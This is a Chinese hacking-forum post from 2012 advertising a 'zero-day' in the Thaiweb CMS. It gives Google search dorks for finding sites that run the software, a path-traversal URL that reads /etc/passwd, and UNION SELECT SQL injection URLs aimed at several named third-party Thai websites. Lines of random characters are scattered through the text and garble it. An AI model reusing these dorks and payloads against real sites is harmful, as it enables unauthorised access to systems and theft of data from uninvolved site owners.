中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
( Z9 P2 `6 [- R# @% f
0 t) i$ b) `" l
intext:powered by Thaiweb
. c. r" u! w/ x2 G; o4 _7 b! s
$ |( v$ l ~5 M2 a K: w: x% T5 H
inurl:index.php?page=board.php
1 L0 [' H' I8 m3 l4 E+ [ Y
& Q. P# I2 M; }" H3 S1 E
- b# o/ ?6 b# W3 S, p
6 N* p% E4 y( Z" c3 w
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
( C1 F- `6 F$ {1 y* ?
?7 k% Z! C3 Q6 s- N9 `
* V( Q( p" k0 I1 [- V
( F; w4 Y) }! e9 `( P
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
! N& `' @6 O8 f& Y
+ n4 a$ q, t9 L, q
& m' i; K' L C
) R9 m$ y' o7 J. ?, b% I
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
3 m8 d4 H+ P, g
' H, w! q1 y, Q# f. g4 ~
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# \# x8 | s1 y. I4 T" H: S
0 l. P) m3 M2 T/ d% _
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
% m% \7 G1 V: {3 ~; S7 \
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2